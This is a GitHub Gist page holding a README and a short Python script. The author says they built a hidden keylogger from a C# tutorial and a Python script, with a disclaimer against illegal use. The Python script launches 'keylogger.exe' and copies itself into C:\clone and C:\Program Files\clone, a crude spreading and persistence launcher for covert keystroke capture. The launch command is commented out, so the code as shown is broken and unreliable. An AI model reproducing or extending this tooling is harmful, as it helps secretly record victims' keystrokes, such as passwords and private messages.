Last active
February 3, 2020 22:15
-
-
Save VosemQ/d2b63c741f4871f1b142924a7bd9dd96 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
------------------------------------------------------------PLEASE READ THIS------------------------------------------------------------ | |
I got the python from tinkernut and edited it a lot. | |
I then got the c# from http://null-byte.wonderhowto.com/how-to/create-simple-hidden-console-keylogger-c-sharp-0132757/. | |
this is open source so you may redistribute it anywhere and edit it how you like. | |
DO NOT USE IT ILLIGALY. I WILL NOT BE HELD RESPONSIBLE ILLIGAL USE. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from sys import argv | |
import string | |
import os | |
script = argv | |
name = str(script[0]) | |
#'cmd = 'start keylogger.exe' | |
os.system(cmd) | |
os.mkdir('C:\clone') | |
#os.system(r"copy keylogger.exe C:\clone") | |
os.system(r"copy " + name + " C:\clone") | |
os.mkdir('C:\Program Files\clone') | |
#os.system(r"copy keylogger.exe C:\Program Files\clone") | |
os.system(r"copy " + name + " C:\Program Files\clone") | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment